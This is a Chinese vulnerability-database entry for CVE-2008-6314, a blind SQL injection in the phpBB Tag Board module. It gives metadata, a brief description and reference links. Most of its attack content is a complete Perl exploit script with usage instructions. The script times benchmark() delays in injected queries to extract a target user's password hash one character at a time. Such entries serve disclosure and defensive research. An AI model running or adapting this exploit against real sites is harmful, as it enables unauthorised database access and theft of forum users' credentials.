https://www.exploit-db.com/exploits/7386
https://cxsecurity.com/issue/WLB-2009030087
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200902-631
phpBB Tag Board模块 'tag_board.php' SQL注入漏洞






漏洞ID | 1116976 | 漏洞类型 | SQL注入 |
发布时间 | 2008-12-08 | 更新时间 | 2009-02-27 |
![]() |
CVE-2008-6314 | ![]() |
CNNVD-200902-631 |
漏洞平台 | PHP | CVSS评分 | 7.5 |
|漏洞来源
|漏洞详情
phpBB是开放源码的论坛程序。phpBBTagBoard模块4.0及其早期版本的tag_board.php中存在SQL注入漏洞。远程攻击者可以借助一个删除操作中的id参数,执行任意SQL指令。
|漏洞EXP
#!/usr/bin/perl
# ---------------------------------------------------------------
# phpBB 3 (Mod Tag Board <= 4) Remote Blind SQL Injection Exploit
# by athos - staker[at]hotmail[dot]it
# http://bx67212.netsons.org/forum/viewforum.php?f=3
# ---------------------------------------------------------------
# Note: Works regardless PHP.ini settings!
# Thanks meh also know as cHoBi
# ---------------------------------------------------------------
use strict;
use LWP::UserAgent;
my ($hash,$time1,$time2);
my @chars = (48..57, 97..102);
my $http = new LWP::UserAgent;
my $host = shift;
my $table = shift;
my $myid = shift or &usage;
sub injection
{
my ($sub,$char) = @_;
return "/tag_board.php?mode=controlpanel&action=delete&id=".
"1+and+(select+if((ascii(substring(user_password,${sub},1)".
")=${char}),benchmark(230000000,char(0)),0)+from+${table}_us".
"ers+where+user_id=${myid})--";
}
sub usage
{
print STDOUT "Usage: perl $0 [host] [table_prefix] [user_id]\n";
print STDOUT "Howto: perl $0 http://localhost/phpBB phpbb 2\n";
print STDOUT "by athos - staker[at]hotmail[dot]it\n";
exit;
}
syswrite(STDOUT,'Hash MD5: ');
for my $i(1..33)
{
for my $j(0..16)
{
$time1 = time();
$http->get($host.injection($i,$chars[$j]));
$time2 = time();
if($time2 - $time1 > 6)
{
syswrite(STDOUT,chr($chars[$j]));
$hash .= chr($chars[$j]);
last;
}
if($i == 1 && length $hash < 0)
{
syswrite(STDOUT,"Exploit Failed!\n");
exit;
}
}
}
# milw0rm.com [2008-12-08]
|参考资料
来源:XF
名称:tagboard-tagboard-sql-injection(47163)
链接:http://xforce.iss.net/xforce/xfdb/47163
来源:BID
名称:32701
链接:http://www.securityfocus.com/bid/32701
来源:MILW0RM
名称:7386
链接:http://www.milw0rm.com/exploits/7386
来源:SECUNIA
名称:33031
链接:http://secunia.com/advisories/33031
来源:OSVDB
名称:50600
链接:http://osvdb.org/50600
检索漏洞
开始时间
结束时间